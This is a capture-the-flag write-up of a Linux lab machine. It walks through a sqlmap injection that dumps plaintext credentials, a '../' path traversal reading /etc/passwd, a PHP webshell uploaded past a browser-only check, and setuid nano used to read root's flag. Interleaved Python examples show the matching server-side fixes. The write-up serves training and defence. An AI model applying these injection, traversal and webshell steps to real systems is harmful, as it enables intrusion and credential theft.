About : Use your red teaming knowledge to pwn a Linux machine.
This challenge is an initial test to evaluate your capabilities in red teaming skills. Start the VM by clicking the Start Machine button at the top right of the task. You will find all the necessary tools to complete the challenge, like Nmap, sqlmap, wordlists, PHP shell, and many more in the AttackBox.
Exposing unnecessary services in a machine can be dangerous. Can you capture the flags and pwn the machine?
Given that it is a dedicated VM for the room, I can do a somewhat brutal network scan:
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.112.103
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 64 ISC BIND 9.16.1-Ubuntu
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open mosquitto version 1.6.9 syn-ack ttl 64
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/bytes/received: 18
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/clients/inactive: 0
| $SYS/broker/load/sockets/5min: 0.20
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/heap/maximum: 49688
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/bytes/received/15min: 1.19
| $SYS/broker/messages/sent: 1
| $SYS/broker/clients/active: 0
| $SYS/broker/store/messages/bytes: 180
| $SYS/broker/heap/current: 47240
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/load/sockets/1min: 0.76
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/uptime: 1276 seconds
| $SYS/broker/messages/received: 1
| $SYS/broker/load/messages/received/15min: 0.07
| $SYS/broker/load/connections/5min: 0.20
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/clients/connected: 0
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/sockets/15min: 0.07
| $SYS/broker/load/bytes/sent/5min: 0.79
|_ $SYS/broker/load/bytes/received/1min: 16.45
So we got FTP, SSH, DNS, an Apache site on 1337 and an MQTT broker.
Let's take a look at the FTP:
ftp 10.10.228.106
Name : anonymous
Password :
dir
-> nothing, empty listing :c
Having a look at Apache gives us more intel:
gobuster dir -u http://10.10.228.106:1337 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.php (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
The /admin path shows us a login page, but the "Continue" button is a fake one.
We also found a /phpmyadmin page.
Playing around /admin reveals more info:
http://10.10.228.106:1337/admin/modules/ -> directory indexing enabled
footer.php
header.php
After a few attempts and messing with the FTP and DNS server, I retried Apache/gobuster, because the message "Is this the right admin portal?" triggered me.
Running big.txt reveals another admin page, /admin_101, and this time the "Continue" button works and the username is prefilled with "hacker@root.thm".
Looking at the request when sending a login attempt, we get an error:
messages [ "SELECT * FROM user WHERE email = 'hacker@root.thm'" ]
The username input is only locked in the front end, so I can send another username.
Let's try sqlmap then:
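The two findings above (the query echoed back in the error, and a lock that only exists in the browser) are both server-side bugs. This added example, not code from the room or its PHP app, rebuilds the lookup with a constructed in-memory SQLite stand-in for the `user` table and shows the vulnerable string-built query next to the parameterized one:

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's `user` table (sample data, not the room's DB).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user (id INTEGER, email TEXT, password TEXT)")
conn.execute("INSERT INTO user VALUES (1, 'hacker@root.thm', 'VeryDifficultPassword!!#@#@!#!@#1231')")

def lookup_vulnerable(email):
    """The pattern the leaked error reveals: the email is pasted straight into the SQL string."""
    query = f"SELECT * FROM user WHERE email = '{email}'"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        # Mirrors the challenge app: the failing query is echoed back to the client, which is
        # exactly what told us the parameter reaches the database unescaped.
        return {"messages": [query], "error": str(exc)}

def lookup_safe(email):
    """Prepared statement: the driver binds the value, so quotes in it never reach the SQL parser."""
    return conn.execute("SELECT * FROM user WHERE email = ?", (email,)).fetchall()

def login_safe(email, password):
    """Check both fields server-side; a disabled input in the browser is not a control."""
    row = conn.execute(
        "SELECT id FROM user WHERE email = ? AND password = ?", (email, password)
    ).fetchone()
    # Return only a verdict, never the query or the row. Passwords should also be stored as
    # salted hashes rather than the plaintext this table holds, so a dump does not hand out the login.
    return row is not None
```

An e-mail containing a single quote makes the vulnerable version fail and leak its query, while the safe version simply finds no match.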
sqlmap --random-agent -u http://10.10.228.106:1337/admin_101/includes/user_login.php --data "email=aaaa&password=a" -p "email" --dump
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url | password |
+----+------------------------------+-----------------------------------------------------+
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 (easytohack) |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+
Table: user
[4 entries]
+----+-----------------+---------------------+--------------------------------------+
| id | email           | created             | password                             |
+----+-----------------+---------------------+--------------------------------------+
| 1  | hacker@root.thm | 2023-02-21 09:05:46 | VeryDifficultPassword!!#@#@!#!@#1231 |
+----+-----------------+---------------------+--------------------------------------+
I manage to log in on http://10.10.228.106:1337/admin_101 with hacker@root.thm and VeryDifficultPassword!!#@#@!#!@#1231.
This gives access to http://10.10.228.106:1337/admin_101/chat.php, but the website says "We're trying to resolve this issue as soon as possible".
And to http://10.10.228.106:1337/file1010111/index.php with the password easytohack; this time the website says:
Parameter Fuzzing is also important :) or Can you hide DOM elements?
and looking at the page source we get a hint saying to use "file" as a parameter for the page.
Seems like we can get files:
http://10.10.228.106:1337/file1010111/index.php?file=../../../../../etc/passwd
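The `file` parameter above is concatenated onto a directory and the `../` sequences walk out of it. This added example (not the room's code) shows the naive join next to a resolver that canonicalises the path and refuses anything outside the include directory; the web root is a constructed temp directory standing in for /file1010111/:

```python
import os
import tempfile

# Constructed stand-in for the page's include directory (assumption: the app keeps its
# includable files in one directory and should never serve anything outside it).
WEBROOT = tempfile.mkdtemp()
INCLUDES = os.path.join(WEBROOT, "includes")
os.makedirs(INCLUDES)
with open(os.path.join(INCLUDES, "about.html"), "w") as fh:
    fh.write("about page")

def resolve_vulnerable(param):
    """Naive concatenation: '../../../../../etc/passwd' walks straight out of INCLUDES."""
    return os.path.normpath(os.path.join(INCLUDES, param))

def resolve_safe(param):
    """Return an absolute path inside INCLUDES, or None if the request escapes it."""
    if not param or "\0" in param or os.path.isabs(param):
        return None
    base = os.path.realpath(INCLUDES)
    # realpath collapses '..' and follows symlinks, so a symlink out of the tree is caught too.
    candidate = os.path.realpath(os.path.join(base, param))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None

def read_include(param):
    """What index.php should do: read only files that resolve_safe() accepted."""
    path = resolve_safe(param)
    if path is None:
        return None
    with open(path) as fh:
        return fh.read()
```

An allow-list of include names (a dict of permitted values to real paths) is simpler still when the set of pages is fixed, as it is for a site this small.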
The other page we got before told us to log in with only a username, but it needs to start with "z":
http://10.10.228.106:1337/upload-cv00101011/index.php
Using the user "zeamkish" from the passwd file we can log in, and here is a web page that lets us upload a file.
I upload a PNG file to test:
http://10.10.228.106:1337/upload-cv00101011/upload_thm_1001/thm-ab-bg-1803.png
The front end does not want me to upload a PHP file; I just edit my PNG upload request, change the name and content, and let's go:
http://10.10.228.106:1337/upload-cv00101011/upload_thm_1001/thm-ab-bg-1803.php?cmd=id
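The upload check only lived in the browser, so renaming the PNG to .php in the intercepted request was enough. This added example (not the room's code) is the server-side validation that would have stopped it: an extension allow-list, a magic-bytes check against the claimed type, and a generated filename so the client never picks what lands on disk. The sample bytes are constructed.

```python
import os
import secrets

# Allow-listed extensions and the signature a file with that extension must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "pdf": b"%PDF-"}

def validate_upload(filename, content):
    """Server-side check of a CV upload. Returns (True, stored_name) or (False, reason)."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in ALLOWED:
        # Rejects thm-ab-bg-1803.php no matter what the browser-side script allowed.
        return False, "extension not allowed"
    if not content.startswith(ALLOWED[ext]):
        # A ".png" whose body is PHP source does not carry the PNG signature.
        return False, "content does not match extension"
    # Never reuse the client-supplied name: a random name means a double extension such as
    # cv.php.png can never end up as cv.php on disk, whatever the web server's handler rules are.
    return True, f"{secrets.token_hex(8)}.{ext}"

# Constructed samples: a minimal PNG header followed by filler, and a PHP source body.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_SAMPLE = b"<?php echo 'hello'; ?>"
```

The upload directory should additionally be served with script execution disabled (for Apache with mod_php, `php_admin_flag engine off` scoped to that directory), so a file that slips past the checks is still only ever downloaded, never executed.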
Using this webshell I found the file "ssh_creds.txt" in zeamkish's directory; it gives us a username and password to log in with SSH on the server.
First flag : THM{USER_FLAG_1231_EXPOSE}
Now I want root!
I find a SUID bit on nano:
-rwsr-xr-x 1 root root 320136 Apr 10 2020 /usr/bin/nano
So I can just edit any file I want, oh glad.
nano /root/flag.txt
Gives us the last flag:
THM{ROOT_EXPOSED_1001}
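A setuid-root editor is the kind of thing a periodic host check should flag before a pentester does. This added example (not part of the writeup) classifies setuid-root files against a baseline and a short list of program types that should never carry the bit; the baseline is a partial, assumed list for a stock Ubuntu 20.04 host, and the sample entries are constructed to mirror the ls -l line above.

```python
import os
import stat

# Setuid-root binaries expected on a stock Ubuntu 20.04 host (partial list, an assumption for the
# example; a real audit snapshots the baseline from a known-good build of the same image).
BASELINE = {"/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
            "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount"}
# Editors, pagers and interpreters: setuid on any of these is a direct root file read/write.
DANGEROUS = {"nano", "vim", "vi", "less", "more", "python3", "perl", "bash", "sh"}

def classify(path, mode, uid):
    """Verdict for one file, or None if it is not a setuid-root regular file."""
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
        return None
    if path in BASELINE:
        return "baseline"
    if os.path.basename(path) in DANGEROUS:
        return "critical"
    return "review"

def audit(entries):
    """entries: iterable of (path, st_mode, st_uid). Returns {path: verdict} for setuid-root files."""
    findings = {}
    for path, mode, uid in entries:
        verdict = classify(path, mode, uid)
        if verdict:
            findings[path] = verdict
    return findings

def walk(root="/usr"):
    """Yield (path, mode, uid) for every file under root; feed this to audit() on a live host."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            yield full, st.st_mode, st.st_uid

# Constructed sample: 0o104755 is a regular file with mode -rwsr-xr-x, as in the ls output above.
SAMPLE = [("/usr/bin/nano", 0o104755, 0), ("/usr/bin/sudo", 0o104755, 0),
          ("/usr/bin/ls", 0o100755, 0), ("/usr/local/bin/backup", 0o104755, 0)]
```

On the box itself the fix is `chmod u-s /usr/bin/nano`; anything the audit reports as "review" needs a reason to exist, and "critical" needs removing.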